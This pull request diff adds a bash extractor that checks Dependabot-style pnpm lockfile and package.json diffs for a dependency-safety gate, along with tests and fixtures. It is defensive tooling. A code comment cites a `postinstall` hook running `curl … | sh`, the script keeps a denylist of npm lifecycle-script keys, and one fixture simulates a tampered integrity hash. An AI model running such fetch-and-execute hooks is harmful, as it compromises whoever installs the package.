### PR TITLE
feat: add npm-bump-extract.sh for pnpm dependency diffs

### DIFF
--- a/scripts/npm-bump-extract.sh
+++ b/scripts/npm-bump-extract.sh
@@ -171,6 +171,26 @@ flush_entry() {
   fi
 }
 
+# emit_tier2 <name> <version>
+# Keyed on name@version for the same reason as emit_tier1 (§6.4).
+emit_tier2() {
+  local key="$1@$2"
+  case "$seen_tier2" in
+    *$'\n'"$key"$'\n'*) return 0 ;;
+  esac
+  seen_tier2="${seen_tier2}${key}"$'\n'
+  tier2_rows+=("$1"$'\t'"$2"$'\t'"npm")
+}
+
+# split_package_key <'name@version'> — sets _pkg_name and _pkg_version.
+# Scoped names start with '@', so the split is on the LAST '@'.
+split_package_key() {
+  local key="$1"
+  _pkg_name="${key%@*}"
+  _pkg_version="${key##*@}"
+  [ -n "$_pkg_name" ] && [ -n "$_pkg_version" ]
+}
+
 # --- Pass 1: lockfile ---
 pass1_lock() {
   local line kind path
@@ -304,10 +324,17 @@ pass1_lock() {
     fi
 
     if [ "$current_disposition" = "tier2" ]; then
-      # Package-key line. Record only which side it appeared on; emission is
-      # Task 6's job.
+      # Package-key line. A legitimate version replacement changes the key AND
+      # its metadata on the same side, which is why the side is still recorded.
       if [[ "$line" =~ ^([+\ -])[[:space:]]+\'?([^\'[:space:]]+)\'?:[[:space:]]*$ ]]; then
         tier2_key_prefix="${BASH_REMATCH[1]}"
+        if [ "$tier2_key_prefix" = "+" ]; then
+          if split_package_key "${BASH_REMATCH[2]}"; then
+            emit_tier2 "$_pkg_name" "$_pkg_version"
+          else
+            disqualify_lock "unparseable package key under packages:: ${BASH_REMATCH[2]}"
+          fi
+        fi
         continue
       fi
       # A changed metadata line is only accounted for when the enclosing
@@ -332,6 +359,9 @@ pass1_lock() {
     fi
   done <<< "$input"
   flush_entry "$entry_name" "$minus_ver" "$plus_ver" "$spec_changed"
+  if [ ${#tier2_rows[@]} -gt "$TIER2_MAX_ENTRIES" ]; then
+    disqualify_lock "tier-2 entries (${#tier2_rows[@]}) exceed cap of ${TIER2_MAX_ENTRIES}"
+  fi
   return 0
 }
 

--- a/scripts/npm-bump-extract.sh
+++ b/scripts/npm-bump-extract.sh
@@ -64,4 +64,63 @@ if ! grep -qE '^(\+\+\+|---|@@|diff --git)' <<< "$input"; then
   exit 2
 fi
 
+# --- Path classification ---
+# Only these two filenames are in scope. package-lock.json and yarn.lock are
+# deliberately NOT handled here; they stay unsupported and fail closed.
+classify_path() {
+  local path="$1" base="${path##*/}"
+  case "$base" in
+    pnpm-lock.yaml) printf 'lock' ;;
+    package.json)   printf 'manifest' ;;
+    *)              printf '' ;;
+  esac
+}
+
+# --- Globals ---
+lock_path=""
+lock_verdict="absent"          # absent | clean | disqualified
+manifest_paths=$'\n'           # newline-delimited, leading+trailing newline
+tier1_rows=()
+tier2_rows=()
+corroborate=$'\n'              # "\n<name>\n" for names whose lock entry changed
+seen_tier1=$'\n'
+seen_tier2=$'\n'
+
+# disqualify_lock <reason> — mark the lockfile unusable and explain why.
+disqualify_lock() {
+  lock_verdict="disqualified"
+  echo "npm-bump-extract.sh: ${lock_path:-pnpm-lock.yaml}: $1" >&2
+}
+
+# --- Pass 1: lockfile ---
+pass1_lock() {
+  local line kind path
+  local in_lock=0
+  while IFS= read -r line; do
+    line="${line%$'\r'}"
+    if [[ "$line" =~ ^diff[[:space:]]--git[[:space:]]a/([^[:space:]]+)[[:space:]]b/([^[:space:]]+) ]]; then
+      path="${BASH_REMATCH[2]}"
+      kind=$(classify_path "$path")
+      if [ "$kind" = "lock" ]; then
+        in_lock=1
+        lock_path="$path"
+        [ "$lock_verdict" = "absent" ] && lock_verdict="clean"
+      else
+        in_lock=0
+        if [ "$kind" = "manifest" ]; then
+          case "$manifest_paths" in
+            *$'\n'"$path"$'\n'*) ;;
+            *) manifest_paths="${manifest_paths}${path}"$'\n' ;;
+          esac
+        fi
+      fi
+      continue
+    fi
+    [ "$in_lock" -eq 1 ] || continue
+    [[ "$line" == +++* ]] && continue
+    [[ "$line" == ---[[:space:]]* ]] && continue
+  done <<< "$input"
+}
+
+pass1_lock
 exit 0

--- a/scripts/npm-bump-extract.sh
+++ b/scripts/npm-bump-extract.sh
@@ -124,6 +124,51 @@ set_section() {
   current_section="$1"
   current_disposition=$(section_disposition "$1")
   seen_column0=1
+  tier2_key_prefix=""
+}
+
+# base_version <version-string> — strip pnpm's peer-dependency suffix.
+# "21.0.2(@types/node@22.19.9)" → "21.0.2"
+base_version() {
+  printf '%s' "${1%%(*}"
+}
+
+# note_corroborated <name> — record that this dependency's lock entry changed.
+note_corroborated() {
+  case "$corroborate" in
+    *$'\n'"$1"$'\n'*) return 0 ;;
+  esac
+  corroborate="${corroborate}${1}"$'\n'
+}
+
+# emit_tier1 <name> <version>
+# Dedup key is name@version, NOT name. A pnpm workspace can resolve the same
+# package at different versions in different importers; keying on name alone
+# drops one of them and produces a scanned-claim over an unscanned version.
+emit_tier1() {
+  local key="$1@$2"
+  case "$seen_tier1" in
+    *$'\n'"$key"$'\n'*) return 0 ;;
+  esac
+  seen_tier1="${seen_tier1}${key}"$'\n'
+  tier1_rows+=("$1"$'\t'"$2"$'\t'"npm")
+}
+
+# flush_entry — called at each entry/section/file boundary. Emits a tier-1 row
+# when the base version changed, and records corroboration when either the
+# specifier or the base version changed.
+flush_entry() {
+  local name="$1" minus="$2" plus="$3" spec="$4"
+  [ -z "$name" ] && return 0
+  local mb pb
+  mb=$(base_version "$minus")
+  pb=$(base_version "$plus")
+  if [ -n "$plus" ] && [ "$mb" != "$pb" ]; then
+    emit_tier1 "$name" "$pb"
+    note_corroborated "$name"
+  elif [ "$spec" -eq 1 ]; then
+    note_corroborated "$name"
+  fi
 }
 
 # --- Pass 1: lockfile ---
@@ -135,6 +180,8 @@ pass1_lock() {
   local seen_column0=0
   local section=""
   local declared=""
+  local entry_name="" minus_ver="" plus_ver="" spec_changed=0
+  local tier2_key_prefix=""
   while IFS= read -r line; do
     line="${line%$'\r'}"
     if [[ "$line" =~ ^diff[[:space:]]--git[[:space:]]a/([^[:space:]]+)[[:space:]]b/([^[:space:]]+) ]]; then
@@ -227,6 +274,53 @@ pass1_lock() {
       continue
     fi
 
+    if [ "$current_disposition" = "tier1" ]; then
+      # Entry key line: a bare quoted-or-plain key with no value.
+      if [[ "$line" =~ ^[+\ -][[:space:]]+\'?([^\':]+)\'?:[[:space:]]*$ ]]; then
+        flush_entry "$entry_name" "$minus_ver" "$plus_ver" "$spec_changed"
+        entry_name="${BASH_REMATCH[1]}"
+        minus_ver=""; plus_ver=""; spec_changed=0
+        continue
+      fi
+      if [[ "$line" =~ ^[+-][[:space:]]+specifier:[[:space:]]*(.*)$ ]]; then
+        spec_changed=1
+        continue
+      fi
+      if [[ "$line" =~ ^-[[:space:]]+version:[[:space:]]*(.*)$ ]]; then
+        minus_ver="${BASH_REMATCH[1]}"
+        continue
+      fi
+      if [[ "$line" =~ ^\+[[:space:]]+version:[[:space:]]*(.*)$ ]]; then
+        plus_ver="${BASH_REMATCH[1]}"
+        continue
+      fi
+      # Anything else that CHANGED under a tier-1 section is unaccounted for.
+      # Falling through here is the §6.1 fail-open: it would clear the file with
+      # an unexamined change. Context lines remain inert.
+      if [[ "$line" =~ ^[+-] ]]; then
+        disqualify_lock "unrecognized changed line under ${current_section}: ${line}"
+      fi
+      continue
+    fi
+
+    if [ "$current_disposition" = "tier2" ]; then
+      # Package-key line. Record only which side it appeared on; emission is
+      # Task 6's job.
+      if [[ "$line" =~ ^([+\ -])[[:space:]]+\'?([^\'[:space:]]+)\'?:[[:space:]]*$ ]]; then
+        tier2_key_prefix="${BASH_REMATCH[1]}"
+        continue
+      fi
+      # A changed metadata line is only accounted for when the enclosing
+      # package key changed on the SAME side. Under a CONTEXT key it means the
+      # version did not move but its tarball did. Fail closed.
+      if [[ "$line" =~ ^([+-]) ]]; then
+        if [ "${BASH_REMATCH[1]}" != "$tier2_key_prefix" ]; then
+          disqualify_lock "changed metadata for an unchanged package version under packages:: ${line}"
+        fi
+      fi
+      continue
+    fi
+
     # Any changed line under a disqualifying or unknown section fails the file.
     if [[ "$line" =~ ^[+-] ]]; then
       case "$current_disposition" in
@@ -237,8 +331,33 @@ pass1_lock() {
       esac
     fi
   done <<< "$input"
+  flush_entry "$entry_name" "$minus_ver" "$plus_ver" "$spec_changed"
   return 0
 }
 
 pass1_lock
+
+case "$MODE" in
+  deps)
+    # `sort -u` over the WHOLE line, never `sort -k1,1 -u`. The latter
+    # deduplicates on the key field only, collapsing foo@1.0.0 and foo@2.0.0
+    # into one row:
+    #   $ printf 'foo\t1.0.0\tnpm\nfoo\t2.0.0\tnpm\n' | sort -t$'\t' -k1,1 -u
+    #   foo	1.0.0	npm
+    if [ "$lock_verdict" = "clean" ] && [ ${#tier1_rows[@]} -gt 0 ]; then
+      printf '%s\n' "${tier1_rows[@]}" | sort -u
+    fi
+    ;;
+  lockfile-entries)
+    if [ "$lock_verdict" = "clean" ] && [ ${#tier2_rows[@]} -gt 0 ]; then
+      printf '%s\n' "${tier2_rows[@]}" | sort -u
+    fi
+    ;;
+  cleared-paths)
+    if [ "$lock_verdict" = "clean" ] && [ -n "$lock_path" ]; then
+      printf '%s\n' "$lock_path"
+    fi
+    ;;
+esac
+
 exit 0

--- a/scripts/npm-bump-extract.sh
+++ b/scripts/npm-bump-extract.sh
@@ -1,0 +1,67 @@
+#!/usr/bin/env bash
+# npm-bump-extract.sh — diff-aware extractor for package.json + pnpm-lock.yaml.
+#
+# Owns all npm-ecosystem diff semantics for the dependency-safety workflow.
+# Emits tier-1 declared dependency rows (mode=deps), tier-2 newly introduced
+# lockfile versions (mode=lockfile-entries), or the paths it proved parseable
+# (mode=cleared-paths). Files with any unrecognized changed line are
+# disqualified and left unsupported so the fail-loud guard fires.
+#
+# Input:  unified diff on stdin
+# Flag:   --mode=deps | --mode=lockfile-entries | --mode=cleared-paths (exactly one)
+# Output (deps):             TSV <name>\t<version>\tnpm, sorted by name, deduped
+# Output (lockfile-entries): TSV <name>\t<version>\tnpm, sorted by name, deduped
+# Output (cleared-paths):    newline-delimited paths, sorted, deduped
+# Exit:   0 on success (possibly zero rows)
+#         2 on malformed input, missing --mode, repeated --mode, unknown argument
+#
+# Bash 3.2 compatible: no `declare -A`, no `mapfile`/`readarray`. Dedup uses a
+# newline-delimited string sentinel, matching scripts/extract-deps.sh.
+#
+# See docs/superpowers/specs/2026-08-04-npm-pnpm-dependency-safety-design.md.
+
+set -euo pipefail
+
+# Maximum tier-2 entries per PR. Exceeding it disqualifies the lockfile rather
+# than truncating the sweep — a truncated scan reported as complete is the one
+# outcome this helper must never produce. 1000 is ~4x the largest observed real
+# Dependabot pnpm PR (253 entries).
+TIER2_MAX_ENTRIES=1000
+
+MODE=""
+for arg in "$@"; do
+  case "$arg" in
+    --mode=deps|--mode=lockfile-entries|--mode=cleared-paths)
+      if [ -n "$MODE" ]; then
+        echo "npm-bump-extract.sh: --mode specified more than once" >&2
+        exit 2
+      fi
+      MODE="${arg#--mode=}"
+      ;;
+    *)
+      echo "npm-bump-extract.sh: unknown argument: $arg" >&2
+      exit 2
+      ;;
+  esac
+done
+
+if [ -z "$MODE" ]; then
+  echo "npm-bump-extract.sh: --mode=deps, --mode=lockfile-entries, or --mode=cleared-paths required" >&2
+  exit 2
+fi
+
+input=$(cat)
+
+# Empty input → exit 0 with no output (matches extract-deps.sh).
+if [ -z "$input" ]; then
+  exit 0
+fi
+
+# Malformed input detection: here-string (not pipeline) to avoid SIGPIPE under
+# pipefail on large valid diffs (issue #50 pattern).
+if ! grep -qE '^(\+\+\+|---|@@|diff --git)' <<< "$input"; then
+  echo "npm-bump-extract.sh: input is not a unified diff" >&2
+  exit 2
+fi
+
+exit 0

--- a/scripts/npm-bump-extract.sh
+++ b/scripts/npm-bump-extract.sh
@@ -28,6 +28,12 @@ set -euo pipefail
 # Dependabot pnpm PR (253 entries).
 TIER2_MAX_ENTRIES=1000
 
+# Lockfile format versions this parser understands. The parser keys on the
+# declared format version and on structure, never on which pnpm produced the
+# file — a future divergence must be a clean red gate, not a silent
+# correctness bug.
+SUPPORTED_LOCKFILE_VERSIONS=$'\n9.0\n'
+
 MODE=""
 for arg in "$@"; do
   case "$arg" in
@@ -128,6 +134,7 @@ pass1_lock() {
   local current_disposition=""
   local seen_column0=0
   local section=""
+  local declared=""
   while IFS= read -r line; do
     line="${line%$'\r'}"
     if [[ "$line" =~ ^diff[[:space:]]--git[[:space:]]a/([^[:space:]]+)[[:space:]]b/([^[:space:]]+) ]]; then
@@ -151,6 +158,14 @@ pass1_lock() {
     [ "$in_lock" -eq 1 ] || continue
     [[ "$line" == +++* ]] && continue
     [[ "$line" == ---[[:space:]]* ]] && continue
+
+    # A document separator means sections may repeat, which the completeness
+    # reasoning does not cover. Distinguished from the diff's own file header
+    # (`--- a/path`), which always carries a path after the marker.
+    if [[ "$line" =~ ^[+\ -]---$ ]]; then
+      disqualify_lock "multi-document lockfile is not supported"
+      continue
+    fi
 
     # Hunk header seeds the section. git's function-context heuristic reports
     # the nearest column-0 line, which for pnpm-lock.yaml is a section name.
@@ -188,6 +203,18 @@ pass1_lock() {
     if [[ "$line" =~ ^[+\ -]([A-Za-z][A-Za-z0-9]*:)[[:space:]]*$ ]] \
        || [[ "$line" =~ ^[+\ -]([A-Za-z][A-Za-z0-9]*:)[[:space:]] ]]; then
       set_section "${BASH_REMATCH[1]}"
+      # A format-version change is always visible in the diff, because a
+      # changed line appears in a hunk by definition. When absent, the format
+      # did not change. Safe to clobber BASH_REMATCH here: set_section above
+      # already consumed the section capture.
+      if [ "$current_disposition" = "version" ] \
+         && [[ "$line" =~ ^\+lockfileVersion:[[:space:]]*\'?([0-9.]+)\'?[[:space:]]*$ ]]; then
+        declared="${BASH_REMATCH[1]}"
+        case "$SUPPORTED_LOCKFILE_VERSIONS" in
+          *$'\n'"$declared"$'\n'*) ;;
+          *) disqualify_lock "unsupported lockfileVersion: $declared" ;;
+        esac
+      fi
       # A changed line that IS the section key still counts as a change under
       # that section (e.g. `-pnpmfileChecksum: sha256-AAAA`).
       if [[ "$line" =~ ^[+-] ]] && [ "$current_disposition" != "version" ]; then

--- a/scripts/npm-bump-extract.sh
+++ b/scripts/npm-bump-extract.sh
@@ -92,10 +92,42 @@ disqualify_lock() {
   echo "npm-bump-extract.sh: ${lock_path:-pnpm-lock.yaml}: $1" >&2
 }
 
+# Disposition of each pnpm-lock.yaml top-level section (spec §6.1).
+# The complete column-0 key set was taken from a real pnpm 12.0.0-beta.4
+# lockfile. Anything absent from this list disqualifies, so a
+# dependency-bearing section added by a future pnpm release produces a red
+# gate rather than a silent gap in the completeness claim.
+section_disposition() {
+  case "$1" in
+    importers:|catalogs:)                     printf 'tier1' ;;
+    packages:)                                printf 'tier2' ;;
+    snapshots:)                               printf 'inert' ;;
+    lockfileVersion:)                         printf 'version' ;;
+    settings:)                                printf 'disqualify' ;;
+    overrides:|patchedDependencies:)          printf 'disqualify' ;;
+    pnpmfileChecksum:)                        printf 'disqualify' ;;
+    packageExtensionsChecksum:)               printf 'disqualify' ;;
+    *)                                        printf 'unknown' ;;
+  esac
+}
+
+# set_section <section-with-colon> — apply a section and its disposition.
+# A disqualifying section only trips the verdict when a line under it actually
+# changed; merely passing through it in context is harmless.
+set_section() {
+  current_section="$1"
+  current_disposition=$(section_disposition "$1")
+  seen_column0=1
+}
+
 # --- Pass 1: lockfile ---
 pass1_lock() {
   local line kind path
   local in_lock=0
+  local current_section=""
+  local current_disposition=""
+  local seen_column0=0
+  local section=""
   while IFS= read -r line; do
     line="${line%$'\r'}"
     if [[ "$line" =~ ^diff[[:space:]]--git[[:space:]]a/([^[:space:]]+)[[:space:]]b/([^[:space:]]+) ]]; then
@@ -119,7 +151,66 @@ pass1_lock() {
     [ "$in_lock" -eq 1 ] || continue
     [[ "$line" == +++* ]] && continue
     [[ "$line" == ---[[:space:]]* ]] && continue
+
+    # Hunk header seeds the section. git's function-context heuristic reports
+    # the nearest column-0 line, which for pnpm-lock.yaml is a section name.
+    # Verified across 1004 hunk headers in three real Dependabot PRs.
+    if [[ "$line" =~ ^@@ ]]; then
+      # Take the section from the text AFTER the closing "@@" only.
+      # `${line##*@@ }` is WRONG here: on a whole-file-add header
+      # `@@ -0,0 +1,8 @@` the closing "@@" has no trailing space, so the glob
+      # matches the LEADING "@@ " instead and yields "-0,0" — a non-empty
+      # string that satisfies `[ -n "$section" ]` and silently skips the
+      # no-section-context disqualification below. A brand-new lockfile would
+      # then be reported as parseable and cleared. Verified on bash 3.2.57.
+      # `[^@]*` is safe because a hunk range contains only digits, commas,
+      # spaces and +/-, so it cannot swallow an "@" in a section name
+      # (e.g. `@@ -1,2 +1,2 @@ lodash@4.17.21:` still yields the full key).
+      section=""
+      if [[ "$line" =~ ^@@[^@]*@@[[:space:]]*(.*)$ ]]; then
+        section="${BASH_REMATCH[1]}"
+        section="${section%%[[:space:]]*}"
+      fi
+      if [ -n "$section" ]; then
+        set_section "$section"
+      elif [ "$seen_column0" -eq 0 ]; then
+        # No trailing context and no column-0 key seen yet: this is a newly
+        # created lockfile arriving as one @@ -0,0 +1,N @@ hunk. Nothing
+        # anchors the section state, so nothing can be proven.
+        disqualify_lock "hunk header carries no section context"
+      fi
+      continue
+    fi
+
+    # A column-0 key inside the hunk body updates the section. Without this a
+    # hunk that crosses a section boundary would keep parsing under the
+    # previous section's rules — the catalogs:/overrides: adjacency case.
+    if [[ "$line" =~ ^[+\ -]([A-Za-z][A-Za-z0-9]*:)[[:space:]]*$ ]] \
+       || [[ "$line" =~ ^[+\ -]([A-Za-z][A-Za-z0-9]*:)[[:space:]] ]]; then
+      set_section "${BASH_REMATCH[1]}"
+      # A changed line that IS the section key still counts as a change under
+      # that section (e.g. `-pnpmfileChecksum: sha256-AAAA`).
+      if [[ "$line" =~ ^[+-] ]] && [ "$current_disposition" != "version" ]; then
+        case "$current_disposition" in
+          disqualify|unknown)
+            disqualify_lock "change under unsupported lockfile section: $current_section"
+            ;;
+        esac
+      fi
+      continue
+    fi
+
+    # Any changed line under a disqualifying or unknown section fails the file.
+    if [[ "$line" =~ ^[+-] ]]; then
+      case "$current_disposition" in
+        disqualify|unknown)
+          disqualify_lock "change under unsupported lockfile section: ${current_section:-<none>}"
+          continue
+          ;;
+      esac
+    fi
   done <<< "$input"
+  return 0
 }
 
 pass1_lock

--- a/scripts/npm-bump-extract.sh
+++ b/scripts/npm-bump-extract.sh
@@ -191,6 +191,188 @@ split_package_key() {
   [ -n "$_pkg_name" ] && [ -n "$_pkg_version" ]
 }
 
+# Lifecycle-script keys. Corroboration already excludes these structurally —
+# a lifecycle key can never appear in an importers-derived dependency set —
+# but the denylist makes the security property visible in the code rather
+# than implied.
+#
+# Lifecycle script names ONLY. `version` and `dependencies` were removed: there
+# is a real npm package named `version`, and denylisting it would reject a
+# legitimate bump. A denylist must not overlap the namespace it sits beside.
+LIFECYCLE_KEYS=$'\npreinstall\ninstall\npostinstall\npreprepare\nprepare\npostprepare\nprepublish\nprepublishOnly\npublish\npostpublish\nprepack\npostpack\npreuninstall\nuninstall\npostuninstall\npreversion\npostversion\n'
+
+# is_valid_range <specifier> — npm version-range grammar. A shell command is
+# not a range, which is what keeps `"postinstall": "curl … | sh"` out.
+#
+# The grammar must accept everything npm permits, or it becomes a
+# false-positive generator that red-gates real manifests on unrelated bumps.
+# Verified against live registry data: eslint declares `"jiti": "*"`, and vite
+# declares `"esbuild": "^0.27.0 || ^0.28.0"` and
+# `"@types/node": "^20.19.0 || >=22.12.0"`.
+is_valid_range() {
+  local spec="$1" part rest
+  # Protocol forms are whole-string.
+  case "$spec" in
+    workspace:*|catalog:*|npm:*) return 0 ;;
+  esac
+  # `||` unions: every alternative must itself be a valid range.
+  case "$spec" in
+    *\|\|*)
+      rest="$spec"
+      while [ -n "$rest" ]; do
+        part="${rest%%\|\|*}"
+        is_valid_simple_range "$part" || return 1
+        [ "$part" = "$rest" ] && break
+        rest="${rest#*\|\|}"
+      done
+      return 0
+      ;;
+  esac
+  is_valid_simple_range "$spec"
+}
+
+# is_valid_simple_range <specifier> — one alternative of a range union.
+# Accepts space-joined intersections (">=1.0.0 <2.0.0") and hyphen ranges
+# ("1.2.3 - 2.3.4") by validating each whitespace-separated token.
+#
+# GLOBBING MUST BE OFF around the word-split loop. With globbing on, an
+# unquoted `$spec` of `*` is expanded against the working directory, so the
+# bare `*` range (eslint declares `"jiti": "*"`) is accepted or rejected
+# depending on whether the cwd happens to contain files. That makes the
+# result environment-dependent — the test suite would pass locally and fail
+# in CI, or vice versa. Verified: without `set -f`, `*` is rejected from a
+# populated directory and accepted from an empty one.
+is_valid_simple_range() {
+  local spec="$1" tok rc=0 restore_glob=0
+  # Trim.
+  spec="${spec#"${spec%%[![:space:]]*}"}"
+  spec="${spec%"${spec##*[![:space:]]}"}"
+  [ -z "$spec" ] && return 1
+  case "$-" in *f*) ;; *) restore_glob=1; set -f ;; esac
+  for tok in $spec; do
+    case "$tok" in
+      -) continue ;;                 # hyphen-range separator
+      \*|x|X) continue ;;            # bare wildcard
+    esac
+    # Comparator/caret/tilde prefix, then a (possibly partial, possibly
+    # wildcarded) version with optional prerelease/build metadata.
+    if ! [[ "$tok" =~ ^(\^|~\>?|\>=|\<=|\>|\<|=|v)?[0-9]+(\.([0-9]+|[xX\*]))*([-+][0-9A-Za-z.-]+)?$ ]]; then
+      rc=1
+      break
+    fi
+  done
+  # Restore on every exit path — a bare `return 1` inside the loop would leave
+  # globbing disabled for the rest of the script.
+  [ "$restore_glob" -eq 1 ] && set +f
+  return "$rc"
+}
+
+manifest_verdict="clean"
+minus_names=$'\n'
+plus_names=$'\n'
+
+disqualify_manifest() {
+  manifest_verdict="disqualified"
+  echo "npm-bump-extract.sh: $1" >&2
+}
+
+# --- Pass 2: manifests ---
+pass2_manifests() {
+  local line path kind name spec prefix
+  local in_manifest=0 current=""
+  while IFS= read -r line; do
+    line="${line%$'\r'}"
+    if [[ "$line" =~ ^diff[[:space:]]--git[[:space:]]a/([^[:space:]]+)[[:space:]]b/([^[:space:]]+) ]]; then
+      path="${BASH_REMATCH[2]}"
+      kind=$(classify_path "$path")
+      if [ "$kind" = "manifest" ]; then
+        in_manifest=1
+        current="$path"
+      else
+        in_manifest=0
+      fi
+      continue
+    fi
+    [ "$in_manifest" -eq 1 ] || continue
+    [[ "$line" == +++* ]] && continue
+    [[ "$line" == ---[[:space:]]* ]] && continue
+    [[ "$line" =~ ^@@ ]] && continue
+    # Only changed lines are judged; context lines are inert.
+    [[ "$line" =~ ^[+-] ]] || continue
+
+    if ! [[ "$line" =~ ^([+-])[[:space:]]*\"([^\"]+)\"[[:space:]]*:[[:space:]]*\"([^\"]*)\"[[:space:]]*,?[[:space:]]*$ ]]; then
+      disqualify_manifest "$current: unrecognized changed line: ${line}"
+      continue
+    fi
+    prefix="${BASH_REMATCH[1]}"
+    name="${BASH_REMATCH[2]}"
+    spec="${BASH_REMATCH[3]}"
+
+    case "$LIFECYCLE_KEYS" in
+      *$'\n'"$name"$'\n'*)
+        disqualify_manifest "$current: lifecycle key changed: $name"
+        continue
+        ;;
+    esac
+
+    if ! is_valid_range "$spec"; then
+      disqualify_manifest "$current: value is not a valid npm range: \"$name\": \"$spec\""
+      continue
+    fi
+
+    case "$corroborate" in
+      *$'\n'"$name"$'\n'*) ;;
+      *)
+        disqualify_manifest "$current: \"$name\" changed with no matching lockfile entry"
+        continue
+        ;;
+    esac
+
+    # Record the side this name appeared on, scoped to the file. Duplicates on
+    # the same side mean the same key changed twice, which is malformed.
+    if [ "$prefix" = "-" ]; then
+      case "$minus_names" in
+        *$'\n'"$current|$name"$'\n'*)
+          disqualify_manifest "$current: duplicate removed key: $name"
+          continue
+          ;;
+      esac
+      minus_names="${minus_names}${current}|${name}"$'\n'
+    else
+      case "$plus_names" in
+        *$'\n'"$current|$name"$'\n'*)
+          disqualify_manifest "$current: duplicate added key: $name"
+          continue
+          ;;
+      esac
+      plus_names="${plus_names}${current}|${name}"$'\n'
+    fi
+  done <<< "$input"
+
+  # Pairing check (spec §6.2). Every changed dependency must appear on BOTH
+  # sides — a replacement. An unmatched `+` is a dependency ADDED and an
+  # unmatched `-` is one REMOVED; both are unusual shapes for a Dependabot
+  # version-update PR and get human review. A new package entering the tree
+  # through a dependency-safety PR is the typosquat vector, and a freshly
+  # published malicious package has no advisories yet, so it scans clean.
+  local entry
+  while IFS= read -r entry; do
+    [ -z "$entry" ] && continue
+    case "$plus_names" in
+      *$'\n'"$entry"$'\n'*) ;;
+      *) disqualify_manifest "${entry%%|*}: dependency removed without replacement: ${entry##*|}" ;;
+    esac
+  done <<< "$(printf '%s' "$minus_names")"
+
+  while IFS= read -r entry; do
+    [ -z "$entry" ] && continue
+    case "$minus_names" in
+      *$'\n'"$entry"$'\n'*) ;;
+      *) disqualify_manifest "${entry%%|*}: dependency added without replacement: ${entry##*|}" ;;
+    esac
+  done <<< "$(printf '%s' "$plus_names")"
+}
+
 # --- Pass 1: lockfile ---
 pass1_lock() {
   local line kind path
@@ -366,14 +548,20 @@ pass1_lock() {
 }
 
 pass1_lock
+pass2_manifests
+
+# A manifest cannot be corroborated without a parseable lockfile, so a
+# disqualified or absent lockfile poisons every manifest in the diff.
+if [ "$lock_verdict" != "clean" ]; then
+  manifest_verdict="disqualified"
+fi
+if [ "$manifest_verdict" != "clean" ]; then
+  lock_verdict="disqualified"
+fi
 
 case "$MODE" in
   deps)
-    # `sort -u` over the WHOLE line, never `sort -k1,1 -u`. The latter
-    # deduplicates on the key field only, collapsing foo@1.0.0 and foo@2.0.0
-    # into one row:
-    #   $ printf 'foo\t1.0.0\tnpm\nfoo\t2.0.0\tnpm\n' | sort -t$'\t' -k1,1 -u
-    #   foo	1.0.0	npm
+    # `sort -u` over the whole line. NEVER `sort -k1,1 -u` — see Task 5.
     if [ "$lock_verdict" = "clean" ] && [ ${#tier1_rows[@]} -gt 0 ]; then
       printf '%s\n' "${tier1_rows[@]}" | sort -u
     fi
@@ -384,8 +572,11 @@ case "$MODE" in
     fi
     ;;
   cleared-paths)
-    if [ "$lock_verdict" = "clean" ] && [ -n "$lock_path" ]; then
-      printf '%s\n' "$lock_path"
+    if [ "$lock_verdict" = "clean" ]; then
+      {
+        [ -n "$lock_path" ] && printf '%s\n' "$lock_path"
+        printf '%s' "$manifest_paths" | sed '/^$/d'
+      } | sort -u
     fi
     ;;
 esac

--- a/tests/extract-deps.bats
+++ b/tests/extract-deps.bats
@@ -41,3 +41,23 @@
   [ "$status" -eq 0 ]
   diff <(echo "$output") tests/fixtures/extract-deps/poetry-lock.tsv
 }
+
+@test "emits zero rows for a pnpm diff (npm files are owned by npm-bump-extract)" {
+  run bash scripts/extract-deps.sh < tests/fixtures/npm-bump-extract/real-grouped-monorepo.diff
+  [ "$status" -eq 0 ]
+  [ -z "$output" ]
+}
+
+@test "pnpm engines and resolution lines do not match the pip parser" {
+  run bash -c 'bash scripts/extract-deps.sh' <<'EOF'
+diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml
+--- a/pnpm-lock.yaml
++++ b/pnpm-lock.yaml
+@@ -1,3 +1,3 @@ packages:
++  '@commitlint/cli@21.0.2':
++    resolution: {integrity: sha512-AAAA==}
++    engines: {node: '>=22.12.0'}
+EOF
+  [ "$status" -eq 0 ]
+  [ -z "$output" ]
+}

--- a/tests/fixtures/npm-bump-extract/lock-catalog-bump.diff
+++ b/tests/fixtures/npm-bump-extract/lock-catalog-bump.diff
@@ -1,0 +1,11 @@
+diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml
+index 1111111..2222222 100644
+--- a/pnpm-lock.yaml
++++ b/pnpm-lock.yaml
+@@ -110,5 +110,5 @@ catalogs:
+   default:
+     '@babel/core':
+-      specifier: ^7.29.6
+-      version: 7.29.6
++      specifier: ^7.29.7
++      version: 7.29.7

--- a/tests/fixtures/npm-bump-extract/lock-cross-section.diff
+++ b/tests/fixtures/npm-bump-extract/lock-cross-section.diff
@@ -1,0 +1,13 @@
+diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml
+index 1111111..2222222 100644
+--- a/pnpm-lock.yaml
++++ b/pnpm-lock.yaml
+@@ -836,8 +836,8 @@ catalogs:
+     '@babel/core':
+       specifier: ^7.29.6
+-      version: 7.29.6
++      version: 7.29.7
+ 
+ overrides:
+-  minimist: ^1.2.6
++  minimist: ^1.2.8

--- a/tests/fixtures/npm-bump-extract/lock-integrity-only.diff
+++ b/tests/fixtures/npm-bump-extract/lock-integrity-only.diff
@@ -1,0 +1,8 @@
+diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml
+index 1111111..2222222 100644
+--- a/pnpm-lock.yaml
++++ b/pnpm-lock.yaml
+@@ -449,3 +449,3 @@ packages:
+   lodash@4.17.21:
+-    resolution: {integrity: sha512-AAAA==}
++    resolution: {integrity: sha512-EVIL==}

--- a/tests/fixtures/npm-bump-extract/lock-multidoc.diff
+++ b/tests/fixtures/npm-bump-extract/lock-multidoc.diff
@@ -1,0 +1,12 @@
+diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml
+index 1111111..2222222 100644
+--- a/pnpm-lock.yaml
++++ b/pnpm-lock.yaml
+@@ -98,6 +98,6 @@ importers:
+       '@pnpm/exe.win32-x64': 12.0.0-beta.4
+ 
++---
++lockfileVersion: '9.0'
++
+ settings:
+   autoInstallPeers: true

--- a/tests/fixtures/npm-bump-extract/lock-new-file.diff
+++ b/tests/fixtures/npm-bump-extract/lock-new-file.diff
@@ -1,0 +1,14 @@
+diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml
+new file mode 100644
+index 0000000..1111111
